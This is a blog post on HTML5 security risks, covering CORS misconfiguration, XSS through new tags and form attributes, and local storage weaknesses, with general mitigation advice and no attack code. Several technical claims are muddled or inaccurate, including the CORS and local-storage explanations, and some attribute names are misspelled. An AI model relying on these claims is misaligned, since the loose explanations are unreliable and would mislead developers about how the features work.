Over the past few years, there have been a lot of changes affecting the key technologies that power the internet.
HTML is the dominant web language and its new version, HTML5 provides impressive web enhancements for new web applications.
However, when this fifth version of HTML was released way back 2014, it became really popular to web and app developers, the issues surrounding its internet security risks also take hold.
Just like every new technology, HTML5 is bound to have defects and pitfalls. Internet security experts and commenters had also predicted this, long before its release.
HTML5 AND ITS IMPORTANCE
HTML5 is the 5th revision of the HTML standard developed by W3C. While it was approved as a standard in October 2014, its adoption began several years earlier.
This language mainly describes the contents and appearance of web pages. Due to its many new features, it makes web pages more interactive and dynamic.
Among these features include messaging enhancements, new parsing rules to enhance flexibility, elimination of redundant attributes and native multimedia support.
W3C developed HTML5 mainly to address the compatibility issues with the previous HTML version.
The main reasons why this version has become so popular is the essential elimination of browser plugins, reduction of web development time and mobile friendliness.
HTML5 is also supported by all the authority browser vendors including Google, Apple, Opera, Microsoft, and Firefox.
THE INTERNET SECURITY RISKS ASSOCIATED WIH HTML5
As HTML5 becomes adopted on a very large scale with a large percentage of browsers. Mobile applications are now based on this language.
It is also important for developers and users to know about the internet security risks involved in order to be able to tackle them.
The security problems that affected the older version are still present.
More importantly, the new features in HTML5 present further internet security issues.
Below are some of the attacks made possible by HTML5.
1. CROSS ORIGIN RESOURCE SHARING (CORS ATTACK)
Cross-Origin Resource Sharing (CORS) is a feature that allows a resource to gain access to data from domains outside itself.
Using this feature, web pages can load resources including scripts, CSS style sheets, and images from different domains.
As such, a remote cyber attacker can inject codes on the web pages.
An API called XMLHttpRequest makes this possible. Basically, this is an API that facilitates the transfer of data between a server and a client.
Before the introduction of HTML5, a site could not make direct requests to another site using this API.
Now, HTTP requests can be made, provided the requested sites grants permission.
This is the point where vulnerability that can be exploited. Access can be granted through the following header in the responses; Access-Control-Allow-Origin.
If a website has wrongly defined this header or based on a wrong assumption, access control can easily be bypassed.
A similar threat called Cross-Site-Request-Forgery (CSRF) was present in HTML4. However, with HTML5 this is possible without user interaction.
2. HTML5 TAG ABUSE
The new attributes and tags introduced by HTML5 present in an internet security threats to cross-site scripting attacks. XSS attacks where attackers run malicious scripts through unencoded or unvalidated user inputs have been around for a while.
Developers often avoid them by filtering user inputs. This is basically not allowing users to input certain character sequences.
Some of the new attributes and tags in HTML5 can be employed to run scripts by bypassing input filters. With HTML5, any object can associate itself with any form regardless of its position on the web page.
This can be exploited for malicious purposes. Attackers can also modify web page forms using attributes in HTML5 such as formaction, fromenctype, formmetod, form target and formnonvalidate.
3. LOCAL STORAGE
Prior to HTML5, browser data was stored through web cookies. The local storage feature in HTML5 was developed to improve internet security and enable storage of more web data.
It allows browsers to store and delete data based on name-value pairs. The good news is that the origin-specific, meaning sites from different origins cannot access applications on local databases.
Unfortunately, it is vulnerable to the aforementioned XSS attacks.
Attackers can also redirect target site requests to different sites using DNS cache poisoning.
There are other internet security issues with HTML5 including Cross Document Messaging, Offline Web Applications, and the middleware framework.
Most of these internet security problems fall into the hands of the web developers.
As such, they can be mitigated by safe coding practices, regular code testing, education on the possible internet security threats, data sanitization and access restriction for untrusted code.
Latest posts by Richard (see all)
- Wide Range of Job Ads Available on the Dark Web - November 5, 2018
- Continuous Exploit of RDP Pushes FBI to Issue Warning to Potential Targets - October 29, 2018
- Ross Ulbricht’s Fifth Year in Jail - October 10, 2018